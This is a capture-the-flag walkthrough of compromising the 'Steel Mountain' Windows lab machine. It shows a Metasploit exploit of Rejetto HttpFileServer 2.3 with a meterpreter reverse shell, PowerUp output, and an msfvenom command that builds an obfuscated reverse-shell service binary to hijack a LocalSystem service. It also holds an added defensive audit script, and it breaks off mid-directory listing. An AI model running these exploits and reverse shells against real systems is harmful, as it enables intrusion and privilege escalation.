[Target Machine] A First Taste of Windows Penetration Testing: Steel Mountain

Introduction: This target machine is the Windows counterpart of Mr. Robot; the difficulty is moderate and it is worth doing.

Steel Mountain

Preface

bilibili:Zacarx

www.zacarx.com

Information Gathering

nmap -p- -A IP

80,8080
# The port scan finds 8080, and the service running there is identified as HttpFileServer 2.3
┌──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.120.68/                                                      

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Oct 26 14:07:07 2022
URL_BASE: http://10.10.120.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.120.68/ ----
==> DIRECTORY: http://10.10.120.68/img/                                                                        
+ http://10.10.120.68/index.html (CODE:200|SIZE:772)                                                           
                                                                                                               
---- Entering directory: http://10.10.120.68/img/ ----
...
┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit HttpFileServer 2.3
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)                                           | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
...

┌──(zacarx㉿zacarx)-[~]
└─$ searchsploit -p 49125          
  Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
      URL: https://www.exploit-db.com/exploits/49125
     Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
.......

Exploitation

msf6 > search HttpFileServer 2.3

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec


msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machin
                                         e or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.107    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.120.68
rhosts => 10.10.120.68
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set Lhost 10.17.0.91
Lhost => 10.17.0.91
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.17.0.91:4444 
[*] Using URL: http://10.17.0.91:8080/rO38EVW
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rO38EVW
[*] Sending stage (175686 bytes) to 10.10.120.68
sessions 1
^C[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YcIgpZ.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : STEELMOUNTAIN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >  getuid
Server username: STEELMOUNTAIN\bill

meterpreter > cd C:\\
meterpreter > ls
Listing: C:\
============

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2019-09-26 22:11:25 +0800  $Recycle.Bin
100666/rw-rw-rw-  1        fil   2013-06-18 20:18:29 +0800  BOOTNXT
040777/rwxrwxrwx  0        dir   2013-08-22 22:48:41 +0800  Documents and Settings
100666/rw-rw-rw-  3162859  fil   2020-10-13 03:06:12 +0800  EC2-Windows-Launch.zip
040777/rwxrwxrwx  0        dir   2013-08-22 23:52:33 +0800  PerfLogs
040555/r-xr-xr-x  4096     dir   2019-09-30 08:42:46 +0800  Program Files
040777/rwxrwxrwx  4096     dir   2019-09-30 08:46:20 +0800  Program Files (x86)
040777/rwxrwxrwx  4096     dir   2019-09-30 08:47:36 +0800  ProgramData
040777/rwxrwxrwx  0        dir   2019-09-26 22:04:30 +0800  System Volume Information
040555/r-xr-xr-x  4096     dir   2019-09-27 14:29:03 +0800  Users
040777/rwxrwxrwx  24576    dir   2020-10-13 03:09:13 +0800  Windows
100444/r--r--r--  398356   fil   2014-03-22 02:49:49 +0800  bootmgr
040777/rwxrwxrwx  0        dir   2019-09-26 22:17:28 +0800  inetpub
100666/rw-rw-rw-  13182    fil   2020-10-13 03:06:12 +0800  install.ps1
000000/---------  0        fif   1970-01-01 08:00:00 +0800  pagefile.sys

meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  8192  dir   2019-09-26 22:11:25 +0800  Administrator
040777/rwxrwxrwx  0     dir   2013-08-22 22:48:41 +0800  All Users
040555/r-xr-xr-x  8192  dir   2014-03-22 03:18:16 +0800  Default
040777/rwxrwxrwx  0     dir   2013-08-22 22:48:41 +0800  Default User
040555/r-xr-xr-x  4096  dir   2013-08-22 23:39:32 +0800  Public
040777/rwxrwxrwx  8192  dir   2019-09-28 00:09:05 +0800  bill
100666/rw-rw-rw-  174   fil   2013-08-22 23:37:57 +0800  desktop.ini

meterpreter > cd ./bill
meterpreter > ls
Listing: C:\Users\bill
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:24 +0800  .groovy
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  AppData
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Application Data
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Contacts
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Cookies
040555/r-xr-xr-x  0        dir   2019-09-28 00:08:24 +0800  Desktop
040555/r-xr-xr-x  4096     dir   2019-09-27 19:07:07 +0800  Documents
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Downloads
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Favorites
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Links
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Local Settings
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Music
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  My Documents
100666/rw-rw-rw-  524288   fil   2020-10-13 03:12:47 +0800  NTUSER.DAT
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:04 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.0.regtrans-ms
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:05 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.1.regtrans-ms
100666/rw-rw-rw-  1048576  fil   2019-09-28 00:09:05 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.2.regtrans-ms
100666/rw-rw-rw-  65536    fil   2019-09-28 00:09:04 +0800  NTUSER.DAT{3a3c0ba1-b123-11e3-80ba-a4badb27b52d}.TxR.blf
100666/rw-rw-rw-  65536    fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw-  524288   fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
                                                            000001.regtrans-ms
100666/rw-rw-rw-  524288   fil   2019-09-27 14:29:12 +0800  NTUSER.DAT{3a3c0ba2-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000
                                                            000002.regtrans-ms
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  NetHood
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Pictures
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  PrintHood
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Recent
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Saved Games
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Searches
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  SendTo
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Start Menu
040777/rwxrwxrwx  0        dir   2019-09-27 14:29:03 +0800  Templates
040555/r-xr-xr-x  0        dir   2019-09-27 19:07:07 +0800  Videos
100666/rw-rw-rw-  483328   fil   2019-09-27 14:29:03 +0800  ntuser.dat.LOG1
100666/rw-rw-rw-  77824    fil   2019-09-27 14:29:03 +0800  ntuser.dat.LOG2
100666/rw-rw-rw-  20       fil   2019-09-27 14:29:03 +0800  ntuser.ini


meterpreter > cd C:\\Users\\bill\\Desktop
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 19:07:07 +0800  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 20:42:38 +0800  user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365

Privilege Escalation

Download the file https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

and upload it to the target machine.

Type powershell_shell and press Enter.

Then run PowerUp.ps1:

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks


ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False
Name           : AWSLiteAgent
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName    : LiveUpdateSvc
Path           : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
                 IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart     : False
Name           : LiveUpdateSvc
Check          : Unquoted Service Paths

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

ServiceName                     : IObitUnSvr
Path                            : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart                      : False
Name                            : IObitUnSvr
Check                           : Modifiable Service Files

ServiceName                     : LiveUpdateSvc
Path                            : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart                      : False
Name                            : LiveUpdateSvc
Check                           : Modifiable Service Files

We can see that AdvancedSystemCareService9 can be restarted (CanRestart : True):

ServiceName                     : AdvancedSystemCareService9
Path                            : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions       : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart                      : True
Name                            : AdvancedSystemCareService9
Check                           : Modifiable Service Files

Therefore, we can upload an executable reverse shell file and replace the original one; since the service runs as LocalSystem, this gives us root privileges.

The steps are as follows:

First, generate a file:
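As an added example (not code from the original post, nor from PowerUp), here are the two checks PowerUp reported above, Unquoted Service Paths and Modifiable Service Files, rewritten as a stand-alone PowerShell audit a defender can run on the host to get the exact directory, binary and identity that need fixing. The trusted-identity list and the write-rights mask are my assumptions; adjust them to the host's baseline.

```powershell
# Added example (not from the original post): audit services for unquoted ImagePaths
# and for binaries/parent directories writable by untrusted identities.
# Run on the Windows host under review; output is per finding, like PowerUp's.

# Identities that may legitimately hold write rights on a service binary path (assumed
# baseline). Any other identity with write-class rights is reported, which is what
# surfaces a per-user ACE such as STEELMOUNTAIN\bill in the output above.
$TrustedIdentities = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, Write, Modify, FullControl'
# Add GENERIC_ALL / GENERIC_WRITE bits, which show up on some inherited ACEs.
$WriteMask = [int]$WriteRights -bor 0x10000000 -bor 0x40000000

function Get-UnquotedPathCandidates {
    # For an unquoted ImagePath containing spaces, Windows tries each space-delimited
    # prefix (with .exe appended) before reaching the real binary. Return those prefixes,
    # e.g. C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\IObit\Advanced.exe
    # for the ASCService.exe path PowerUp flagged.
    param([Parameter(Mandatory)][string]$ImagePath)
    if ($ImagePath.StartsWith('"')) { return @() }
    $m = [regex]::Match($ImagePath, '^(.*?\.exe)', 'IgnoreCase')
    if (-not $m.Success -or $m.Groups[1].Value -notmatch ' ') { return @() }
    $parts = $m.Groups[1].Value -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Get-UntrustedWriters {
    # Return the identities outside $TrustedIdentities that hold write-class rights on $Path.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    $writers = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($TrustedIdentities -contains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { $ace.IdentityReference.Value }
    }
    return @($writers | Sort-Object -Unique)
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (-not $svc.PathName) { continue }
    $imagePath = [Environment]::ExpandEnvironmentVariables($svc.PathName)

    # Check 1: Unquoted Service Path. The parent directory of each candidate is where a
    # rogue binary would have to be planted, so that directory's ACL is what matters.
    foreach ($cand in Get-UnquotedPathCandidates -ImagePath $imagePath) {
        $dir = Split-Path -Path $cand -Parent
        $who = @(Get-UntrustedWriters -Path $dir)
        if ($who.Count -gt 0) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                               Check = 'Unquoted Service Path'; Path = $dir
                               WritableBy = ($who -join ', ') }
        }
    }

    # Check 2: Modifiable Service File. The service binary itself is writable.
    $exeMatch = [regex]::Match($imagePath, '^"?(.*?\.exe)', 'IgnoreCase')
    if ($exeMatch.Success) {
        $who = @(Get-UntrustedWriters -Path $exeMatch.Groups[1].Value)
        if ($who.Count -gt 0) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                               Check = 'Modifiable Service File'; Path = $exeMatch.Groups[1].Value
                               WritableBy = ($who -join ', ') }
        }
    }
}

if ($findings) {
    # Remediation: quote the ImagePath (sc.exe config <name> binPath= "...") and remove the
    # listed identities' write rights on Path (icacls); services running as LocalSystem first.
    $findings | Sort-Object Service, Check | Format-Table -AutoSize
} else {
    'No unquoted-path or writable-binary findings.'
}
```

On Steel Mountain this reports C:\ and C:\Program Files (x86)\IObit for the unquoted paths, and the three IObit binaries as writable by bill, matching the PowerUp output above.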

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.0.91 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

Then go to the location of the original file:

meterpreter > cd Program\ Files\ (x86)
meterpreter > ls
Listing: C:\Program Files (x86)
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:46 +0800  Common Files
040777/rwxrwxrwx  0     dir   2019-09-26 23:17:48 +0800  IObit
040777/rwxrwxrwx  4096  dir   2014-03-22 03:08:30 +0800  Internet Explorer
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Microsoft.NET
040777/rwxrwxrwx  0     dir   2019-09-30 08:46:20 +0800  Uninstall Information
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:33 +0800  Windows Mail
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  Windows NT
040777/rwxrwxrwx  0     dir   2013-08-22 23:39:30 +0800  WindowsPowerShell
100666/rw-rw-rw-  174   fil   2013-08-22 23:37:57 +0800  desktop.ini

meterpreter > cd IObit
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  32768  dir   2022-10-26 14:03:29 +0800  Advanced SystemCare
040777/rwxrwxrwx  16384  dir   2019-09-27 13:35:24 +0800  IObit Uninstaller
040777/rwxrwxrwx  4096   dir   2019-09-26 23:18:50 +0800  LiveUpdate

meterpreter > cd Advanced\ SystemCare
meterpreter > ls
Listing: C:\Program Files (x86)\IObit\Advanced SystemCare
=========================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  5091616  fil   2016-08-17 02:03:56 +0800  ASC.exe
100777/rwxrwxrwx  691488   fil   2015-12-29 04:48:34 +0800  ASCDownload.exe
100666/rw-rw-rw-  166176   fil   2015-12-29 04:47:32 +0800  ASCExtMenu.dll
100666/rw-rw-rw-  187680   fil   2015-12-29 04:47:30 +0800  ASCExtMenu_64.dll
100777/rwxrwxrwx  574240   fil   2016-03-04 08:16:34 +0800  ASCInit.exe
100666/rw-rw-rw-  743      fil   2019-09-26 23:17:50 +0800  ASCInit.log
100777/rwxrwxrwx  452384   fil   2016-07-26 01:01:08 +0800  ASCService.exe
100666/rw-rw-rw-  104270   fil   2022-10-26 15:12:56 +0800  ASCService.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:49 +0800  ASCServiceLog
100777/rwxrwxrwx  2023712  fil   2016-07-28 02:24:22 +0800  ASCTray.exe
100777/rwxrwxrwx  555808   fil   2015-12-29 05:06:42 +0800  ASCUpgrade.exe
100777/rwxrwxrwx  2400528  fil   2019-09-26 23:18:22 +0800  ASCVER.exe
100777/rwxrwxrwx  599328   fil   2015-12-29 04:48:46 +0800  AUpdate.exe
100666/rw-rw-rw-  64800    fil   2015-12-29 04:48:24 +0800  About.dll
100777/rwxrwxrwx  310560   fil   2016-07-28 02:24:20 +0800  About.exe
100666/rw-rw-rw-  21506    fil   2019-09-26 23:18:14 +0800  ActionCenter2.log
100777/rwxrwxrwx  2254624  fil   2016-01-08 09:13:48 +0800  ActionCenterDownloader.exe
100777/rwxrwxrwx  1917728  fil   2016-04-30 02:12:38 +0800  AutoCare.exe
100777/rwxrwxrwx  191264   fil   2015-12-29 04:52:24 +0800  AutoReactivator.exe
100777/rwxrwxrwx  1194784  fil   2016-04-30 02:12:40 +0800  AutoSweep.exe
100777/rwxrwxrwx  1403680  fil   2016-07-21 00:15:38 +0800  AutoUpdate.exe
100666/rw-rw-rw-  18536    fil   2019-09-27 16:32:33 +0800  AutoUpdate.log
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:46 +0800  Backup
100777/rwxrwxrwx  1063200  fil   2016-03-08 02:14:22 +0800  BrowserCleaner.exe
100666/rw-rw-rw-  131872   fil   2016-07-21 00:15:42 +0800  CPUIDInterface.dll
040777/rwxrwxrwx  0        dir   2019-09-26 23:17:42 +0800  Config
100777/rwxrwxrwx  451872   fil   2015-12-29 04:49:22 +0800  DNSProtect.exe
100777/rwxrwxrwx  513528   fil   2016-04-13 04:10:24 +0800  Dashlane_Launcher.exe
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:51 +0800  Database
100777/rwxrwxrwx  2172704  fil   2016-05-07 00:50:26 +0800  DefaultProgram.exe
100666/rw-rw-rw-  11220    fil   2016-02-23 02:18:02 +0800  DetectionEx.ini
100777/rwxrwxrwx  438560   fil   2016-01-12 04:30:04 +0800  DiskDefrag.exe
100666/rw-rw-rw-  607520   fil   2015-12-29 04:49:12 +0800  DiskMap.dll
100666/rw-rw-rw-  127776   fil   2016-07-21 00:15:44 +0800  DiskScan.dll
100777/rwxrwxrwx  72992    fil   2015-12-29 04:49:16 +0800  DiskScan.exe
100777/rwxrwxrwx  110368   fil   2016-01-12 09:54:36 +0800  Display.exe
100666/rw-rw-rw-  586      fil   2022-10-26 14:03:06 +0800  Display_log.txt
100666/rw-rw-rw-  14716    fil   2013-07-20 09:31:32 +0800  DownloadApplication.xml
100666/rw-rw-rw-  81539    fil   2016-01-08 05:10:46 +0800  EULA.rtf
100777/rwxrwxrwx  1221408  fil   2016-07-21 00:15:46 +0800  FeedBack.exe
100666/rw-rw-rw-  454432   fil   2015-12-29 05:06:54 +0800  FfSweep.dll
100777/rwxrwxrwx  4939536  fil   2019-09-26 23:18:20 +0800  FreeBigupgrade1211.exe
100777/rwxrwxrwx  1019680  fil   2015-12-29 05:10:30 +0800  Homepage.exe
100666/rw-rw-rw-  750880   fil   2016-01-21 09:23:28 +0800  HomepageSvc.dll
100666/rw-rw-rw-  387360   fil   2016-03-04 04:21:28 +0800  ICONPIN32.dll
100777/rwxrwxrwx  380192   fil   2016-03-04 04:21:30 +0800  ICONPIN32.exe
100666/rw-rw-rw-  614176   fil   2016-03-04 04:21:34 +0800  ICONPIN64.dll
100777/rwxrwxrwx  582944   fil   2016-03-04 04:21:36 +0800  ICONPIN64.exe
100777/rwxrwxrwx  9474336  fil   2016-07-09 05:42:24 +0800  IObitUninstaller.exe
100666/rw-rw-rw-  899872   fil   2016-07-21 00:15:50 +0800  InfoHelp.dll
100777/rwxrwxrwx  21280    fil   2016-03-10 07:56:44 +0800  Iobit_RefreshTaskBar.exe
100666/rw-rw-rw-  15       fil   2014-07-23 05:15:36 +0800  Lang.dat
040777/rwxrwxrwx  8192     dir   2019-09-26 23:17:42 +0800  Language
040777/rwxrwxrwx  4096     dir   2019-09-26 23:18:19 +0800  LatestNews
040777/rwxrwxrwx  4096     dir   2019-09-26 23:17:45 +0800  LinkImages
100777/rwxrwxrwx  2960672  fil   2016-07-21 00:15:54 +0800  LiveUpdate.exe
100666/rw-rw-rw-  768      fil   2019-09-26 23:17:49 +0800  LiveUpdate.log
100777/rwxrwxrwx  667424   fil   2015-12-29 04:49:32 +0800  LocalLang.exe
100777/rwxrwxrwx  1530656  fil   2016-07-21 00:15:56 +0800  Monitor.exe
100777/rwxrwxrwx  533792   fil   2015-12-29 04:49:38 +0800  MonitorDisk.exe
100777/rwxrwxrwx  2111776  fil   2016-04-30 02:12:52 +0800  MyWin10.exe
100777/rwxrwxrwx  569632   fil   2016-07-23 01:20:00 +0800  Nfeatures.exe
